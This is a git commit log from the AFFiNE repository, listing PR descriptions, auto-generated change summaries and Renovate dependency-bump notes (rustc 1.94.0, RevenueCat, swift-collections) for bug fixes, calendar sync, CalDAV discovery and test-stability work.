#### PR Dependency Tree


* **PR #14785** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
  * Updated error-tracking SDK versions across frontend packages.
* Upgraded Electron build toolchain and front-end build plugins for
improved compatibility.
* Replaced a SWC-based React plugin with the standard React Vite plugin.
  * Removed unused development dependencies from CLI tooling.
  * Bumped a Rust workspace dependency to a patch release.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-05 12:25:18 +08:00
DarkSky ffc27af3ba fix(server): update version check (#14784)
fix #14780


#### PR Dependency Tree


* **PR #14784** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

## Release Notes

* **Bug Fixes**
* Improved upgrade availability detection to properly compare semantic
versions, including support for prerelease and canary versions. The
system now accurately identifies when new versions are available,
ensuring users receive timely update notifications.

* **Tests**
* Added comprehensive unit tests for version comparison and upgrade
detection functionality.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-05 10:56:05 +08:00
DarkSky d975bf46fb feat(server): improve calendar sync queue (#14783)
#### PR Dependency Tree


* **PR #14783** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
  * Configurable request timeout for calendar integrations.
* Calendar polling now enqueues per-subscription sync jobs (larger
batch) for improved throughput.

* **Bug Fixes / Improvements**
* Persisted next-sync timestamps and retry counts for more reliable
scheduling and retry behavior.
* Exponential backoff and webhook renewal now update scheduling
consistently.

* **Refactor**
* Calendar sync flow moved to a job-queue-driven design for better
concurrency and observability.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-05 10:52:18 +08:00
chauhan_s bfcf7fc2ba fix: close docs bulk toolbar after delete (#14711)
### Before 
https://www.loom.com/share/a626b23f29cb4a48b33d721341d734f8

### After

https://www.loom.com/share/0c88ef4f92ac470fbb76608e2de43fa7


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Fixed floating toolbar remaining visible after deleting multiple
documents via the confirmation dialog so it reliably closes when
deletion completes.

* **Tests**
* Added end-to-end checks to verify the floating toolbar is dismissed
after multi-item and “select all” deletions.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
2026-04-04 23:51:21 +08:00
DarkSky 5a6c65085a feat(mobile): adapt new endpoint (#14778)
#### PR Dependency Tree


* **PR #14778** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)
2026-04-04 20:39:42 +08:00
DarkSky 4be0cba9b5 chore(server): db health check (#14779)
#### PR Dependency Tree


* **PR #14779** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
* Added conditional init checks to service deployments and jobs to wait
for the database proxy before starting
* Exposed a new health port (9801) for the database proxy to enable
readiness probing

* **Tests**
  * Minor test reordering and formatting changes (no behavioral changes)
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-04 00:09:37 +08:00
Hana B afea9121cf fix: save column header edits when pressing Enter (#14775)
## The Fix

Fixes #14744.

Updated the menu input Enter key behavior so that pressing Enter now
saves the edited database column header name and closes the menu
immediately.

This reuses the existing `blur()` save flow, keeping the behavior
consistent with clicking outside the input.

The Tab key behavior remains unchanged and still saves through the
existing blur flow.

## Video Demonstration

### After


https://github.com/user-attachments/assets/820a7c41-cae5-477c-8b65-b0667e0ce82b

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Improved keyboard handling in context menu input to properly blur the
input field when pressing Enter, ensuring cleaner interaction behavior.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-03 20:18:58 +08:00
DarkSky 3912d8d74d fix: lint 2026-04-03 20:10:44 +08:00
DarkSky d3ec008b0c chore: bump deps (#14777)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **New Features**
* Migration and config commands now feature interactive prompts for
required inputs.

* **Bug Fixes**
  * Enhanced error handling in CLI operations.

* **Chores**
  * Updated GraphQL Code Generator toolchain to v6.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-03 19:36:18 +08:00
Vitaly Barakov d0607b5ce7 chore(i18n): improve RU translate (#14718)
improve RU translate

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Improvements**
  * Enhanced Russian language support across the application.
* Updated messaging for self-hosted installations and workspace
licensing.
* Added Russian text for document analytics UI, including metrics and
viewer information.
* Added Russian text for workspace sharing controls and calendar
integration features.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-03 10:53:02 +08:00
DarkSky 8ca3f2d53d fix(core): settings i18n refresh (#14760)
replace #14758


#### PR Dependency Tree


* **PR #14760** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Enhanced language switching to ensure the settings dialog properly
reflects language changes when users update their language preference.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-03 03:37:49 +08:00
DarkSky 0da32d61ae fix(server): race condition for sync (#14770)
#### PR Dependency Tree


* **PR #14770** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

## Release Notes

* **New Features**
* Implemented batch processing for calendar synchronization to improve
performance and resource utilization.
* Added distributed locking to prevent concurrent operations in
multi-instance environments.

* **Bug Fixes**
* Improved reliability by preventing duplicate synchronization attempts.

* **Tests**
  * Enhanced test coverage for batch processing and locking mechanisms.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-03 03:37:09 +08:00
DarkSky 233004f867 chore: bump oxlint & enable more supported rules (#14769) 2026-04-03 03:36:52 +08:00
sanabriageorge cdadf8588a fix(core): nested numbered list order (#14764)
## The Fix ##
Fixes #13396. The issue happened because 'doc.getPrev(model)' returns
previous node based in document order instead of previous sibling within
list level. This caused nested list items to inherit the numbering from
their parent rather than restarting. The fix ensures that numbering is
calculated relative to correct list context.

## Video Demonstration ##
### Before ###

https://github.com/user-attachments/assets/9523209a-93d9-4984-aa9e-149ac1941036

### After ###

https://github.com/user-attachments/assets/ff28b166-3572-4536-9893-0ab5c05c8d9f






<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
  * Enhanced numbered list ordering logic for improved list handling.

* **Chores**
* Updated environment configuration template with active sample values
for database connectivity, caching services, AI integrations, and email
delivery settings.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-02 20:06:25 +08:00
chauhan_s 8c07ea2a0e fix: allow PDF preview on readonly public pages (#14761)
fixes https://github.com/toeverything/AFFiNE/issues/14727

https://www.loom.com/share/dfcd558332404896b3e02aad97b18f02

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
  * PDF attachments can now be previewed in read-only documents.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-01 19:12:14 +08:00
DarkSky 91ad783973 fix(test): e2e stability (#14749)
#### PR Dependency Tree


* **PR #14749** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Improved link preview reliability by updating request identification
to better match modern browsers.
* **Tests**
* Made end-to-end and integration tests deterministic and more robust,
improving AI chat, image generation, attachment handling, settings
visibility, and editor flows.
* **Chores**
* Updated underlying tooling versions to enhance stability and
compatibility.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-29 23:26:15 +08:00
DarkSky 9ca520a81f feat(core): auto scroll for chat panel (#14748)
#### PR Dependency Tree


* **PR #14748** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **New Features**
* Enhanced auto-scroll behavior for AI chat messages—the chat now
intelligently pauses auto-scrolling when you manually scroll away and
resumes when you scroll back near the bottom.
* Auto-scroll now pauses when expanding or collapsing AI tool results
and document edits.

* **Tests**
* Added unit tests for AI chat message scroll behavior and interactions.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-29 22:17:10 +08:00
DarkSky 64f385817d feat(server): add perf metrics for apply update (#14736)
#### PR Dependency Tree


* **PR #14736** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Chores**
* Enhanced Kubernetes deployment health check configurations with
explicit timeout, period, failure threshold, and success threshold
settings for improved reliability.
* Improved document synchronization infrastructure with enhanced codec
comparison and merge update capabilities for better data consistency
handling.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-27 19:50:53 +08:00
chauhan_s 9cf98d9345 fix: restore kanban scroll in fullscreen mode (#14708)
fixes #14679

This fixes a layout issue where Kanban boards stopped horizontally
scrolling in fullscreen/full-width page mode.

https://github.com/user-attachments/assets/375fb8f7-3652-4207-8f9c-ee4cdae881ad


The root cause was not in the Kanban view itself, but in the page-mode
viewport wrapper. In fullscreen mode, the editor expands to full width,
and the existing display: table wrapper caused the outer editor
container to size from Kanban content instead of the viewport. That
prevented the Kanban scroller from owning horizontal overflow correctly.

### What changed
Keep the fullscreen editor wrapper constrained to the viewport width
Override the page-mode viewport content wrapper from display: table to
display: block only when a fullscreen editor is present
Leave the default/non-fullscreen layout behavior unchanged
### Why this works
With the outer fullscreen wrapper locked to viewport width, horizontal
overflow stays inside the Kanban view, so its existing overflow-x:
scroll behavior works again.



<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Improved full-screen editor layout rendering to ensure proper width
and display constraints are applied correctly in full-screen mode.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-27 02:18:55 +08:00
chauhan_s a617da99e2 fix: iCloud CalDAV discovery fallback and resolve calendarsCount in GraphQL (#14728)
fixes #14696

iCloud was returning 400 Bad Request for /.well-known/caldav, which
caused AFFiNE to fail before reaching the actual CalDAV endpoints. This
change makes discovery fall back to the base CalDAV URL for that case,
which lets the iCloud account link flow continue successfully.

This also adds a GraphQL field resolver for
CalendarAccountObjectType.calendarsCount. The field is requested by the
frontend, but some mutation return paths were returning a raw account
object without that computed value, which caused GraphQL to fail on a
non-null field.

---

### Why this was needed

iCloud rejected the standard well-known discovery probe with 400, even
though the rest of the CalDAV flow worked.
calendarsCount is a computed field used by the frontend, so it should be
resolved by GraphQL rather than manually attached in individual service
methods.

---

### How to test

Generate an Apple app-specific password: [Apple
Support](https://support.apple.com/en-gb/102654)
In AFFiNE, add an iCloud CalDAV account using:
your Apple Account email
the new app-specific password
Confirm the account links successfully and calendars load without the
previous GraphQL error.

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **New Features**
  * Calendar accounts now display the total number of calendars.

* **Bug Fixes**
* Enhanced calendar discovery process to handle additional HTTP error
conditions.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-27 02:16:25 +08:00
DarkSky a41c5e4366 feat: adapt cloudflare worker ai (#14732)
#### PR Dependency Tree


* **PR #14732** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Cloudflare Workers AI added as a Copilot provider (configurable in
admin settings).
  * Gemini 3.1 Flash Lite Preview model made available.

* **Behavior Changes**
* Reranking now uses a different default model identifier (affects
relevancy scores).

* **Tests**
* Rerank tests adjusted to focus on the updated model and expected
results.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-27 02:15:49 +08:00
DarkSky 5b05c5a1b2 feat(server): refactor record schema (#14729)
#### PR Dependency Tree


* **PR #14729** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Transcriptions now produce structured meeting summaries (strict JSON)
and a normalized, speaker‑tagged, non‑overlapping transcript with legacy
projection support.

* **API**
* Submission accepts richer transcription input; results return
source‑audio metadata, slice manifest, quality indicators, normalized
segments/transcript, and structured summary JSON.

* **Frontend**
* Recording flow stores transcription metadata and uploads preprocessed
audio slices with slice/quality info; UI-side result normalization
applied.

* **Tests**
* Expanded unit, contract, and e2e coverage for normalization, payload
parsing, persistence/retry, and end‑to‑end transcription flows.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-26 21:32:36 +08:00
Aisha Roslan a3379c8979 fix(editor): font weight dropdown empty on Chrome/Safari in edgeless mode (#14725)
### Summary
Resolves #14528. Normalizes font family string before comparison.
Removes browser dependency.

### What Changed
On Edgeless mode, font dropdown was not appearing for shapes on Chrome.
Now, it appears on Chrome, Safari, and Firefox.

### Screenshot Verification
**Google Chrome**
<img width="623" height="322" alt="Screenshot 2026-03-25 at 1 24 51 PM"
src="https://github.com/user-attachments/assets/fb05790d-6842-43ce-a014-2b24d15bc80d"
/>

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Improved font matching to be more tolerant of whitespace, quotes, and
casing so font family comparisons are consistent across browsers,
reducing incorrect font fallbacks and visual mismatches.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-26 06:49:10 +00:00
DarkSky 166372cc3e fix: test in mac (#14712)
#### PR Dependency Tree


* **PR #14712** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Chores**
* Enhanced Electron test environment cleanup with improved termination
signal handling and child process resource management.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-24 09:59:10 +08:00
DarkSky 9b56a05159 feat(native): async recorder (#14700)
#### PR Dependency Tree


* **PR #14700** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Durable, resumable import queue with explicit import lifecycle and
updated popup/tray status behavior.
* Async native recording APIs and ability to abort recordings; audio
quality metrics (degraded, overflow count).
  * Added "Importing..." translation.

* **Bug Fixes**
* More reliable single-claim import processing, retries and cleanup to
avoid duplicate imports.
  * Improved stop/abort teardown stability and safer shutdown behavior.

* **Tests**
* New/updated tests covering coordinator, import queue, native async
flows and teardown scenarios.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-23 22:38:52 +08:00
renovate[bot] b0251c93cb chore: bump up rustc version to v1.94.0 (#14701)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [rustc](https://redirect.github.com/rust-lang/rust) | minor | `1.93.1`
→ `1.94.0` |

---

### Release Notes

<details>
<summary>rust-lang/rust (rustc)</summary>

###
[`v1.94.0`](https://redirect.github.com/rust-lang/rust/blob/HEAD/RELEASES.md#Version-1940-2026-03-05)

[Compare
Source](https://redirect.github.com/rust-lang/rust/compare/1.93.1...1.94.0)

\==========================

<a id="1.94.0-Language"></a>

## Language

- [Impls and impl items inherit `dead_code` lint level of the
corresponding traits and trait
items](https://redirect.github.com/rust-lang/rust/pull/144113)
- [Stabilize additional 29 RISC-V target features including large
portions of the RVA22U64 / RVA23U64
profiles](https://redirect.github.com/rust-lang/rust/pull/145948)
- [Add warn-by-default `unused_visibilities` lint for visibility on
`const _`
declarations](https://redirect.github.com/rust-lang/rust/pull/147136)
- [Update to Unicode
17](https://redirect.github.com/rust-lang/rust/pull/148321)
- [Avoid incorrect lifetime errors for
closures](https://redirect.github.com/rust-lang/rust/pull/148329)

<a id="1.94.0-Platform-Support"></a>

## Platform Support

- [Add `riscv64im-unknown-none-elf` as a tier 3
target](https://redirect.github.com/rust-lang/rust/pull/148790)

Refer to Rust's [platform support page][platform-support-doc]
for more information on Rust's tiered platform support.

[platform-support-doc]:
https://doc.rust-lang.org/rustc/platform-support.html

<a id="1.94.0-Libraries"></a>

## Libraries

- [Relax `T: Ord` bound for some `BinaryHeap<T>`
methods.](https://redirect.github.com/rust-lang/rust/pull/149408)

<a id="1.94.0-Stabilized-APIs"></a>

## Stabilized APIs

-
[`<[T]>::array_windows`](https://doc.rust-lang.org/stable/std/primitive.slice.html#method.array_windows)
-
[`<[T]>::element_offset`](https://doc.rust-lang.org/stable/std/primitive.slice.html#method.element_offset)
-
[`LazyCell::get`](https://doc.rust-lang.org/stable/std/cell/struct.LazyCell.html#method.get)
-
[`LazyCell::get_mut`](https://doc.rust-lang.org/stable/std/cell/struct.LazyCell.html#method.get_mut)
-
[`LazyCell::force_mut`](https://doc.rust-lang.org/stable/std/cell/struct.LazyCell.html#method.force_mut)
-
[`LazyLock::get`](https://doc.rust-lang.org/stable/std/sync/struct.LazyLock.html#method.get)
-
[`LazyLock::get_mut`](https://doc.rust-lang.org/stable/std/sync/struct.LazyLock.html#method.get_mut)
-
[`LazyLock::force_mut`](https://doc.rust-lang.org/stable/std/sync/struct.LazyLock.html#method.force_mut)
- [`impl TryFrom<char> for
usize`](https://doc.rust-lang.org/stable/std/convert/trait.TryFrom.html#impl-TryFrom%3Cchar%3E-for-usize)
-
[`std::iter::Peekable::next_if_map`](https://doc.rust-lang.org/stable/std/iter/struct.Peekable.html#method.next_if_map)
-
[`std::iter::Peekable::next_if_map_mut`](https://doc.rust-lang.org/stable/std/iter/struct.Peekable.html#method.next_if_map_mut)
- [x86 `avx512fp16`
intrinsics](https://redirect.github.com/rust-lang/rust/issues/127213)
  (excluding those that depend directly on the unstable `f16` type)
- [AArch64 NEON fp16
intrinsics](https://redirect.github.com/rust-lang/rust/issues/136306)
  (excluding those that depend directly on the unstable `f16` type)
-
[`f32::consts::EULER_GAMMA`](https://doc.rust-lang.org/stable/std/f32/consts/constant.EULER_GAMMA.html)
-
[`f64::consts::EULER_GAMMA`](https://doc.rust-lang.org/stable/std/f64/consts/constant.EULER_GAMMA.html)
-
[`f32::consts::GOLDEN_RATIO`](https://doc.rust-lang.org/stable/std/f32/consts/constant.GOLDEN_RATIO.html)
-
[`f64::consts::GOLDEN_RATIO`](https://doc.rust-lang.org/stable/std/f64/consts/constant.GOLDEN_RATIO.html)

These previously stable APIs are now stable in const contexts:

-
[`f32::mul_add`](https://doc.rust-lang.org/stable/std/primitive.f32.html#method.mul_add)
-
[`f64::mul_add`](https://doc.rust-lang.org/stable/std/primitive.f64.html#method.mul_add)

<a id="1.94.0-Cargo"></a>

## Cargo

- Stabilize the config include key. The top-level include config key
allows loading additional config files, enabling better organization,
sharing, and management of Cargo configurations across projects and
environments.
[docs](https://doc.rust-lang.org/nightly/cargo/reference/config.html#including-extra-configuration-files)
[#&#8203;16284](https://redirect.github.com/rust-lang/cargo/pull/16284)
- Stabilize the pubtime field in registry index. This records when a
crate version was published and enables time-based dependency resolution
in the future. Note that crates.io will gradually backfill existing
packages when a new version is published. Not all crates have pubtime
yet.
[#&#8203;16369](https://redirect.github.com/rust-lang/cargo/pull/16369)
[#&#8203;16372](https://redirect.github.com/rust-lang/cargo/pull/16372)
- Cargo now parses [TOML v1.1](https://toml.io/en/v1.1.0) for manifests
and configuration files. Note that using these features in Cargo.toml
will raise your development MSRV, but the published manifest remains
compatible with older parsers.
[#&#8203;16415](https://redirect.github.com/rust-lang/cargo/pull/16415)
- [Make `CARGO_BIN_EXE_<crate>` available at runtime
](https://redirect.github.com/rust-lang/cargo/pull/16421/)

<a id="1.94.0-Compatibility-Notes"></a>

## Compatibility Notes

- [Forbid freely casting lifetime bounds of
`dyn`-types](https://redirect.github.com/rust-lang/rust/pull/136776)
- [Make closure capturing have consistent and correct behaviour around
patterns](https://redirect.github.com/rust-lang/rust/pull/138961)
Some finer details of how precise closure captures get affected by
pattern matching have been changed. In some cases, this can cause a
non-move closure that was previously capturing an entire variable by
move, to now capture only part of that variable by move, and other parts
by borrow. This can cause the borrow checker to complain where it
previously didn't, or cause `Drop` to run at a different point in time.
- [Standard library macros are now imported via prelude, not via
injected
`#[macro_use]`](https://redirect.github.com/rust-lang/rust/pull/139493)
  This will raise an error if macros of the same name are glob imported.
For example if a crate defines their own `matches` macro and then glob
imports that,
it's now ambiguous whether the custom or standard library `matches` is
meant and
  an explicit import of the name is required to resolve the ambiguity.
One exception is `core::panic` and `std::panic`, if their import is
ambiguous
a new warning
([`ambiguous_panic_imports`](https://redirect.github.com/rust-lang/rust/issues/147319))
is raised.
This may raise a new warning
([`ambiguous_panic_imports`](https://redirect.github.com/rust-lang/rust/issues/147319))
on `#![no_std]` code glob importing the std crate.
Both `core::panic!` and `std::panic!` are then in scope and which is
used is ambiguous.
- [Don't strip shebang in expression-context
`include!(…)`s](https://redirect.github.com/rust-lang/rust/pull/146377)
This can cause previously working includes to no longer compile if they
included files which started with a shebang.
- [Ambiguous glob reexports are now also visible
cross-crate](https://redirect.github.com/rust-lang/rust/pull/147984)
This unifies behavior between local and cross-crate errors on these
exports, which may introduce new ambiguity errors.
- [Don't normalize where-clauses before checking
well-formedness](https://redirect.github.com/rust-lang/rust/pull/148477)
- [Introduce a future compatibility warning on codegen attributes on
body-free trait
methods](https://redirect.github.com/rust-lang/rust/pull/148756)
  These attributes currently have no effect in this position.
- [On Windows `std::time::SystemTime::checked_sub_duration` will return
`None` for times before the Windows epoch
(1/1/1601)](https://redirect.github.com/rust-lang/rust/pull/148825)
- [Lifetime identifiers such as `'a` are now NFC
normalized](https://redirect.github.com/rust-lang/rust/pull/149192).
- [Overhaul filename handling for cross-compiler
consistency](https://redirect.github.com/rust-lang/rust/pull/149709)
Any paths emitted by compiler now always respect the relative-ness of
the paths and `--remap-path-prefix` given originally.
One side-effect of this change is that paths emitted for local crates in
Cargo (path dependencies and workspace members) are no longer absolute
but relative when emitted as part of a diagnostic in a downstream crate.

<a id="1.94.0-Internal-Changes"></a>

## Internal Changes

These changes do not affect any public interfaces of Rust, but they
represent
significant improvements to the performance or internals of rustc and
related
tools.

- [Switch to `annotate-snippets` for error
emission](https://redirect.github.com/rust-lang/rust/pull/150032)
  This should preserve mostly the same outputs in rustc error messages.

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My42Ni40IiwidXBkYXRlZEluVmVyIjoiNDMuNjYuNCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-23 21:13:22 +08:00
DarkSky 5d124ee55b feat(server): improve subscription sync stability (#14703) 2026-03-23 21:13:00 +08:00
DarkSky dcf041a3f2 fix(editor): ci stability (#14704)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
* Improved Electron shutdown, diagnostics and tab teardown for more
reliable exits and forced cleanup on stubborn processes.
* **Tests**
* Added polling-based test helpers, stronger scroll/page readiness,
timeout-tolerant page selection, and async cleanup/worker teardown;
updated many tests to wait for UI/model updates and rendering frames.
* **Bug Fixes**
* Reduced flakiness by awaiting paragraph visibility, nested counts,
selection/navigation stability, tab counts, post-action renders, and
safer element interactions.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-23 16:25:15 +08:00
renovate[bot] 8ba02ed6fb chore: bump up RevenueCat/purchases-ios-spm version to from: "5.66.0" (#14699)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
|
[RevenueCat/purchases-ios-spm](https://redirect.github.com/RevenueCat/purchases-ios-spm)
| minor | `from: "5.60.0"` → `from: "5.66.0"` |

---

### Release Notes

<details>
<summary>RevenueCat/purchases-ios-spm
(RevenueCat/purchases-ios-spm)</summary>

###
[`v5.66.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.65.0...5.66.0)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.65.0...5.66.0)

###
[`v5.65.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5650)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.64.0...5.65.0)

#### 5.65.0

###
[`v5.64.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5640)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.63.0...5.64.0)

#### 5.64.0

###
[`v5.63.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5630)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.62.0...5.63.0)

#### 5.63.0

###
[`v5.62.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5620)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.61.0...5.62.0)

#### 5.62.0

###
[`v5.61.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5610)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.60.0...5.61.0)

#### 5.61.0

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My42Ni40IiwidXBkYXRlZEluVmVyIjoiNDMuNjYuNCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-22 04:03:11 +08:00
renovate[bot] ffa3ff9d7f chore: bump up apple/swift-collections version to from: "1.4.1" (#14697)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
|
[apple/swift-collections](https://redirect.github.com/apple/swift-collections)
| patch | `from: "1.4.0"` → `from: "1.4.1"` |

---

### Release Notes

<details>
<summary>apple/swift-collections (apple/swift-collections)</summary>

###
[`v1.4.1`](https://redirect.github.com/apple/swift-collections/releases/tag/1.4.1):
Swift Collections 1.4.1

[Compare
Source](https://redirect.github.com/apple/swift-collections/compare/1.4.0...1.4.1)

This patch release is mostly focusing on evolving the package traits
`UnstableContainersPreview` and `UnstableHashedContainers`, with the
following notable fixes and improvements to the stable parts of the
package:

- Make the package documentation build successfully on the DocC that
ships in Swift 6.2.
- Avoid using floating point arithmetic to size collection storage in
the `DequeModule` and `OrderedCollections` modules.

#### Changes to experimental package traits

The new set and dictionary types enabled by the
`UnstableHashedContainers` trait have now resolved several correctness
issues in their implementation of insertions. They have also gained some
low-hanging performance optimizations. Like before, these types are in
"working prototype" phase, and while they have working implementations
of basic primitive operations, we haven't done much work validating
their performance yet. Feedback from intrepid early adopters would be
very welcome.

The `UnstableContainersPreview` trait has gained several new protocols
and algorithm implementations, working towards one possible working
model of a coherent, ownership-aware container/iteration model.

- [`BidirectionalContainer`][BidirectionalContainer] defines a container
that allows iterating over spans backwards, and provides decrement
operations on indices -- an analogue of the classic
`BidirectionalCollection` protocol.
- [`RandomAccessContainer`][RandomAccessContainer] models containers
that allow constant-time repositioning of their indices, like
`RandomAccessCollection`.
- [`MutableContainer`][MutableContainer] is the ownership-aware analogue
of `MutableCollection` -- it models a container type that allows its
elements to be arbitrarily reordered and mutated/reassigned without
changing the shape of the data structure (that is to say, without
invalidating any indices).
- [`PermutableContainer`][PermutableContainer] is an experimental new
spinoff of `MutableContainer`, focusing on reordering items without
allowing arbitrary mutations.
- [`RangeReplaceableContainer`][RangeReplaceableContainer] is a partial,
ownership-aware analogue of `RangeReplaceableCollection`, providing a
full set of insertion/append/removal/consumption operations, with
support for fixed-capacity conforming types.
- [`DynamicContainer`][DynamicContainer] rounds out the
range-replacement operations with initializer and capacity reservation
requirements that can only be implemented by dynamically sized
containers.

[BidirectionalContainer]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/Container/BidirectionalContainer.swift

[RandomAccessContainer]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/Container/RandomAccessContainer.swift

